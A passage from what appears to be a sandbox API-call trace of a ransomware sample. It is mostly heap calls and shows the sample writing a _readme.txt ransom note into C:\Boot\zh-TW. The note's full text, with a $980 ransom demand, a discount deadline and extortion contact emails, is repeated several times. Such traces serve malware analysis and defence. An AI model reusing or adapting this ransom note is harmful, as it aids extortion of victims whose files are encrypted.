hHeap=0x660000) returned 1 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.366] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0056.366] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.366] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.366] PathFindFileNameW (pszPath="") returned="" [0056.366] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.366] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.366] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.367] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.367] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0056.367] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0056.367] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.367] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.367] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.367] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.367] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.368] CloseHandle (hObject=0x5c8) returned 1 [0056.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.368] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.369] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.369] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.369] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.369] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.369] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165a8 [0056.369] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.373] 